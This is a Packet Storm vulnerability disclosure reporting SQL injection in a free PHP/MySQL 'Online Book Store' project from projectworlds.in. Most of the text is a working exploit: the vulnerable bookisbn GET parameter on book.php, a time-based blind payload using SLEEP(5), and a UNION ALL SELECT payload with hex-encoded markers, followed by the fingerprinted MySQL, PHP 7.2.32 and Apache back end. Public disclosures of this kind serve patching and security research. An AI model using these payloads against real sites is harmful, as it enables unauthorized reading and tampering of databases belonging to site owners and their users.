Online Book Store SQL Injection

2020-08-13T00:00:00
ID PACKETSTORM:158854
Type packetstorm
Reporter Yussef Dajdaj
Modified 2020-08-13T00:00:00

Description

                                        
                                            `  
  
====================================================================  
Online Book Store project in PHP Mysql - SQL injection  
====================================================================  
####################################################################  
.:. Author : Yussef Dajdaj  
.:. Contact :  
.:. Vendor : https://projectworlds.in/  
.:. Script : https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/  
.:. Date: : 8/8/2020  
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP  
####################################################################  
  
===[ Exploit ]===  
  
[*] SQL injection  
=================================  
  
https://localhost/testing/book.php?bookisbn='[injection<https://localhost/testing/book.php?bookisbn='%5binjection>]  
  
Parameter: bookisbn (GET)  
  
Type: time-based blind  
Payload: bookisbn=978-1-1180-2669-4' AND (SELECT 6407 FROM (SELECT(SLEEP(5)))AXNT) AND 'uTiZ'='uTiZ  
  
Type: UNION query  
Payload: bookisbn=-5816' UNION ALL SELECT CONCAT(0x716a707a71,0x6442504257556d676a596278427966694f7854544a677357556e615041477066714f4e51754c704e,0x7178766b71),NULL,NULL,NULL,NULL,NULL,NULL-- rHNm  
  
the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43  
  
  
`